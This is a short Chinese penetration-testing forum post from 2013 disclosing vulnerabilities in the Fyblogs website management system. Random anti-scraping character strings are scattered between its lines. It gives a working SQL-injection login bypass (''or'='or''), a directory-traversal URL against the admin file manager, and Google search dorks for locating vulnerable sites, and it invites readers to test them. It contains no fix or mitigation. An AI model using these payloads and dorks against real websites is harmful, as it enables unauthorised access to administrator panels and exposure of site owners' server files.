中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
- K3 h8 H5 h" ~; ]2 T
7 c' o: u% }& \9 Q5 a% g
简要描述:
4 Y! ^9 ?1 F, [& V/ q- t S. {
# ]2 L M3 r/ @1 c y9 f: Q# v
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
) F/ k$ e5 I) P% l0 p/ _
0 M4 B. g4 K% t* o' Y- {
详细说明:
! ?% I/ G+ Z+ u) ]: ^) q
+ N9 `4 S2 Y* `
后台万能密码 'or'='or'
& S h- e- {" |
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: k. ]: {5 H+ z' S) J. P
admin/uploadfile.asp?currentFolder=/upfiles/../
% W5 K- W/ }3 o4 {+ p7 S
/ _7 }; B" I' C
漏洞证明:
3 g' N- f: S+ r& ^
! S; v% @* V4 I- D$ q2 V$ ]4 h
谷歌:inurl:type.asp?id=1 新闻中心
% ?+ G# Z; Q; x) |9 M- D d
或者 :inurl:download_ok.asp?
5 f7 e6 _7 R0 M" `: V
+ i! Z2 Q8 |) L/ V% s. Q1 m
可以测试
4 k5 x- D. I4 i- `( G
$ z' P* e7 u6 Q m. w+ r8 ^( L
2 |1 d6 J+ y9 A( B
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2